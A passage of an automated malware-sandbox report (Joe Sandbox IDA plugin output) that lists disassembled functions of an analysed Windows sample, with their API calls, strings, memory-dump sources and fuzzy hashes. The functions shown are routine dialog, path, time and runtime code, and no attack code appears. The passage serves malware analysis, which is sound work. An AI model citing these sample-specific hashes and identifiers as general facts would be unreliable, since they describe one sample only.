                                                                              • Opcode Fuzzy Hash: fa1062fe3ef53a27a03243346ca5fc636820780ca14343c6c18c2c20812840a9
                                                                              • Instruction Fuzzy Hash: 07A011302223008FA3008F32AA0A2083AA8EB022A0308802AA008C0232EB2080A08A00
                                                                              Function 00DD357D Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 229COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DD80D1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,00DC98C5,00000200,?,?,00000007), ref: 00DD80E9
                                                                              • _strlen.LIBCMT ref: 00DD35D3
                                                                              • SetDlgItemTextW.USER32(?,00000064,?), ref: 00DD3629
                                                                              • GetWindowRect.USER32(?,?), ref: 00DD3658
                                                                              • GetClientRect.USER32(?,?), ref: 00DD3664
                                                                              • GetWindowRect.USER32(?,?), ref: 00DD3731
                                                                              • SetWindowTextW.USER32(?,?), ref: 00DD375F
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00DD3767
                                                                              • GetWindow.USER32(?,00000005), ref: 00DD3776
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DD37A6
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00DD381A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$Text$ByteCharClientItemMetricsMultiSystemWide_strlen
                                                                              • String ID: $%s:$CAPTION$d
                                                                              • API String ID: 480691170-2512411981
                                                                              • Opcode ID: 219e436ea2abaeaef7500619dd38ea3bd23eca726ec980e69c20c37147b41214
                                                                              • Instruction ID: d2d73cd74b93a1eb25c4dc924d3e7bc32a070b09711e343a96c6b4db52edaea9
                                                                              • Opcode Fuzzy Hash: 219e436ea2abaeaef7500619dd38ea3bd23eca726ec980e69c20c37147b41214
                                                                              • Instruction Fuzzy Hash: 16817FB2209341AFD714DF68CD85E6FBBE9EB88714F04491DFA84E7290D770E9448B62
                                                                              Function 00DE2EA7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00E090B0,00000FA0,?,?,00DE2E85), ref: 00DE2EB3
                                                                              • GetModuleHandleW.KERNEL32(<pi-ms-win-core-synch-l1-2-0.dll,?,?,00DE2E85), ref: 00DE2EBE
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00DE2E85), ref: 00DE2ECF
                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DE2EE1
                                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DE2EEF
                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00DE2E85), ref: 00DE2F12
                                                                              • DeleteCriticalSection.KERNEL32(00E090B0,00000007,?,?,00DE2E85), ref: 00DE2F35
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00DE2E85), ref: 00DE2F45
                                                                              Strings
                                                                              • WakeAllConditionVariable, xrefs: 00DE2EE7
                                                                              • SleepConditionVariableCS, xrefs: 00DE2EDB
                                                                              • kernel32.dll, xrefs: 00DE2ECA
                                                                              • <pi-ms-win-core-synch-l1-2-0.dll, xrefs: 00DE2EB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                              • String ID: <pi-ms-win-core-synch-l1-2-0.dll$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
                                                                              • API String ID: 2565136772-369236946
                                                                              • Opcode ID: 16f0f657df1f3063865228d98490b664ce62c364c9156c15221e85187553993e
                                                                              • Instruction ID: d9128844fa320613d17ae9422e2b6208186b3a5f10a5f9034d929deb9eb30d7e
                                                                              • Opcode Fuzzy Hash: 16f0f657df1f3063865228d98490b664ce62c364c9156c15221e85187553993e
                                                                              • Instruction Fuzzy Hash: 2B014C71640721AFDB202B77EC19E773A789F45B61B09C412FA05E6792DBB1C844CA70
                                                                              Function 00DCE001 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCE00B
                                                                              • GetLongPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00DCE022
                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000000), ref: 00DCE061
                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00DCE08E
                                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00DCE0CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: NamePath$LongShort$H_prolog3_
                                                                              • String ID: rtmp
                                                                              • API String ID: 3803749914-870060881
                                                                              • Opcode ID: d1c8aba1ad1a16271a9c3662ac7ae6a596d8034a25540a1873bc65399f26a2b1
                                                                              • Instruction ID: 5fc91eaf6e1ae8e0f24311fe53bbd76caadc33288661f73d40a696bd4576c7c0
                                                                              • Opcode Fuzzy Hash: d1c8aba1ad1a16271a9c3662ac7ae6a596d8034a25540a1873bc65399f26a2b1
                                                                              • Instruction Fuzzy Hash: E49141749002569ADF24EB60CC65FEDB779EF62300F48409DE406A3293EF745E89CA70
                                                                              Function 00DE0D59 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DE0D60
                                                                              • ShowWindow.USER32(?,00000000), ref: 00DE0F4C
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00DE0F84
                                                                              • CloseHandle.KERNEL32(?), ref: 00DE0FAC
                                                                              • ShowWindow.USER32(?,00000001), ref: 00DE0FF8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CloseCodeExitH_prolog3_HandleProcess
                                                                              • String ID: .exe$.inf$<
                                                                              • API String ID: 1101579886-2155991917
                                                                              • Opcode ID: acde78387a8966132388ca67cc989559dab63cb29dfef32e00a658bc5091a05d
                                                                              • Instruction ID: 5fb2d65aee21e0b18ed386a553cb3140c7d113197a37566665baceacc7368913
                                                                              • Opcode Fuzzy Hash: acde78387a8966132388ca67cc989559dab63cb29dfef32e00a658bc5091a05d
                                                                              • Instruction Fuzzy Hash: 1A819D309042899ECF21FFA2D855BEC7B70AF55704F18402DE9416B292EBB09DCACB70
                                                                              Function 00DD019E Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00DD01A5
                                                                              • CoCreateInstance.COMBASE(00DFB8B0,00000000,00000001,00DFB8A0,?), ref: 00DD01C0
                                                                                • Part of subcall function 00DD053C: __EH_prolog3.LIBCMT ref: 00DD0543
                                                                                • Part of subcall function 00DD043F: __EH_prolog3.LIBCMT ref: 00DD0446
                                                                                • Part of subcall function 00DD043F: SysFreeString.OLEAUT32(?), ref: 00DD0491
                                                                              • VariantClear.OLEAUT32(?), ref: 00DD0311
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3$ClearCreateFreeInstanceStringVariant
                                                                              • String ID: Name$Pou$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL
                                                                              • API String ID: 1275433175-1470209851
                                                                              • Opcode ID: 1f44d729543d7f44111ee364ec043ba60bac603885f7ba8c7d3274c193c4c71c
                                                                              • Instruction ID: b9cc9a3754d5544a90eeb6f816ba062f9efa3ad9605c02393d6e72be6d9fea37
                                                                              • Opcode Fuzzy Hash: 1f44d729543d7f44111ee364ec043ba60bac603885f7ba8c7d3274c193c4c71c
                                                                              • Instruction Fuzzy Hash: D051F770A00219AFDB04EBA4DC95ABEBBB9FF48710F544159E912A73A0DB306D05CF70
                                                                              Function 00DDFA40 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndDialog.USER32(?,00000001), ref: 00DDFA8D
                                                                              • SendMessageW.USER32(?,00000080,00000001,000304D1), ref: 00DDFAB5
                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00000000), ref: 00DDFACF
                                                                              • GetDlgItem.USER32(?,00000065), ref: 00DDFAEF
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DDFB04
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DDFB1B
                                                                              • SetForegroundWindow.USER32(?), ref: 00DDFB22
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Item$DialogForegroundWindow
                                                                              • String ID: LICENSEDLG
                                                                              • API String ID: 3693826088-2177901306
                                                                              • Opcode ID: a38b4945785724a8c4c002c6042466208b4082be7f76c6a887f06680eb5e2366
                                                                              • Instruction ID: d5a7cdceb5df579964071d6b11bba98a0f6866bd7755a7049221e8244c1a8e08
                                                                              • Opcode Fuzzy Hash: a38b4945785724a8c4c002c6042466208b4082be7f76c6a887f06680eb5e2366
                                                                              • Instruction Fuzzy Hash: 3E2106713402007FE6116F66AD0EFBB366DEB49B01F08412AFA4AF73D2DBA19C459275
                                                                              Function 00DD7819 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 409COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DD7823
                                                                              • __Init_thread_footer.LIBCMT ref: 00DD7F42
                                                                                • Part of subcall function 00DDE16C: __EH_prolog3_GS.LIBCMT ref: 00DDE173
                                                                                • Part of subcall function 00DDE16C: GetLastError.KERNEL32(0000001C,00DD78A2,?,%ls,00E13550,00000254,00DC3112,00000039,?), ref: 00DDE18B
                                                                                • Part of subcall function 00DDE16C: SetLastError.KERNEL32(00000000,?), ref: 00DDE1BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorH_prolog3_Last$Init_thread_footer
                                                                              • String ID: #$%ls$%s: %s$P5$`5
                                                                              • API String ID: 1419464261-2187842751
                                                                              • Opcode ID: 2ade0e841977990187355ed45a8685af40efc0510a7e6567e5b693ff05f4ae37
                                                                              • Instruction ID: 633be1096088263ed34ca68ab88531b7eac8b5576a5b532b3fc745cd8b026b41
                                                                              • Opcode Fuzzy Hash: 2ade0e841977990187355ed45a8685af40efc0510a7e6567e5b693ff05f4ae37
                                                                              • Instruction Fuzzy Hash: 36F17E3580522ADBDF24ABB0D95DBACB764EF05310F2440CAE6056B3C6EA749E44EF71
                                                                              Function 00DE6741 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00DE6860
                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00DE696E
                                                                              • _UnwindNestedFrames.LIBCMT ref: 00DE6AC0
                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00DE6ADB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 2751267872-393685449
                                                                              • Opcode ID: 560081a52c521dfe99fc21e99227f15479650e1ab6ae338ac8d1bb27cab63f13
                                                                              • Instruction ID: fd97fdb363c000e98f3c5dd8d92778c05a868a1574f5aa3d13a17f6d6bdb895d
                                                                              • Opcode Fuzzy Hash: 560081a52c521dfe99fc21e99227f15479650e1ab6ae338ac8d1bb27cab63f13
                                                                              • Instruction Fuzzy Hash: 3FB15A71C00289DFCF19EFA6C8819AEB7B5FF24350B18856AE8056B252D731DA51CFB1
                                                                              Function 00DDD4C3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindow.USER32(?,00000005), ref: 00DDD4F2
                                                                              • GetClassNameW.USER32(00000000,?,00000080), ref: 00DDD51C
                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DDD54E
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DDD595
                                                                              • DeleteObject.GDI32(?), ref: 00DDD59C
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00DDD5A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ClassDeleteNameObject
                                                                              • String ID: STATIC
                                                                              • API String ID: 4005992627-1882779555
                                                                              • Opcode ID: 45c876d36c6002ac11074d05ce454e27f072e947a6db61a1b6076d51e6a6f6b9
                                                                              • Instruction ID: 0aa9545f69557bc665d6d49a92bed1e82af2cd8409ff4dfb8eff841271c77d0a
                                                                              • Opcode Fuzzy Hash: 45c876d36c6002ac11074d05ce454e27f072e947a6db61a1b6076d51e6a6f6b9
                                                                              • Instruction Fuzzy Hash: 7021B4712443016FD620AF21AC4ABAE77E9EB99710F10451AF941A73C0DF74AD09CA76
                                                                              Function 00DEE443 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _strrchr
                                                                              • String ID:
                                                                              • API String ID: 3213747228-0
                                                                              • Opcode ID: 6486562c184c195ddb05251636b70aa4ae08bf8bc2e133a250ad95c6446ebb57
                                                                              • Instruction ID: f7b6d19113436c811f63e71481bbf6cd2712f97fcdfed0008b3dd2fdeb64aaec
                                                                              • Opcode Fuzzy Hash: 6486562c184c195ddb05251636b70aa4ae08bf8bc2e133a250ad95c6446ebb57
                                                                              • Instruction Fuzzy Hash: 48B18832A003D69FDB11AF69CC81BBE7BA5EF25310F184569E944AF382D674D901C7B0
                                                                              Function 00DD72E4 Relevance: 10.6, APIs: 7, Instructions: 127timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DD011A: GetVersionExW.KERNEL32(?), ref: 00DD014B
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,00000000,?,?), ref: 00DD7322
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?), ref: 00DD7334
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 00DD7345
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00DD7355
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00DD7365
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00DD739F
                                                                              • __aullrem.LIBCMT ref: 00DD7445
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion__aullrem
                                                                              • String ID:
                                                                              • API String ID: 118991323-0
                                                                              • Opcode ID: c6002dfcdaf6e645b6d4729cce77d0752c443b9e4d44afc0226d1e9b6aa996e1
                                                                              • Instruction ID: 6ef0c2ff95df53929dd09164f454bab69d6d72144e0e4e5ce009ef199804ab65
                                                                              • Opcode Fuzzy Hash: c6002dfcdaf6e645b6d4729cce77d0752c443b9e4d44afc0226d1e9b6aa996e1
                                                                              • Instruction Fuzzy Hash: 7A41F5725083499FC754DF65C88496BBBE9FB88704F048A2FF596D2240E774E909CB62
                                                                              Function 00DE6210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00DE6247
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00DE624F
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00DE62D8
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00DE6303
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00DE6358
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: d79603e9b15c15778e3e0bee3a4608b5a2ed79dbf60ea6b5b2e1321cba38cb48
                                                                              • Instruction ID: f557b7c0aca9826281853f6bb353722a181cff88c748b3e4a41258bb0f55957f
                                                                              • Opcode Fuzzy Hash: d79603e9b15c15778e3e0bee3a4608b5a2ed79dbf60ea6b5b2e1321cba38cb48
                                                                              • Instruction Fuzzy Hash: 1F41F630E002989FCF10EF6AC880A9E7FB5EF54364F188055E9149B392D771E915CBB5
                                                                              Function 00DE1EF1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00DE1F6C,00DE1ECF,00DE2170), ref: 00DE1F08
                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DE1F1E
                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DE1F33
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                              • API String ID: 667068680-1718035505
                                                                              • Opcode ID: c5aa96a24ffcfaf94ca75e5c517eb902668ce4408c9bdceb8969bed9142da9fc
                                                                              • Instruction ID: 016ab1dea78faece2e986be5ac764be008f85194acf6dc0c0b8ce563abaf8646
                                                                              • Opcode Fuzzy Hash: c5aa96a24ffcfaf94ca75e5c517eb902668ce4408c9bdceb8969bed9142da9fc
                                                                              • Instruction Fuzzy Hash: EDF0C83B7053929F8F206E629D8057723DC9F467A53498177E541E7690DB30CC8896F1
                                                                              Function 00DE2540 Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,381977BE,?,00000000,00000000,00E05678,000000FE,?,00DD0437,?), ref: 00DE25C9
                                                                              • __alloca_probe_16.LIBCMT ref: 00DE25EE
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00DE2644
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DE264F
                                                                              • GetLastError.KERNEL32(80070057,381977BE,?,00000000,00000000,00E05678,000000FE,?,00DD0437,?,?,00DD0468,?,00000004,00DD0251,SELECT * FROM Win32_OperatingSystem), ref: 00DE2687
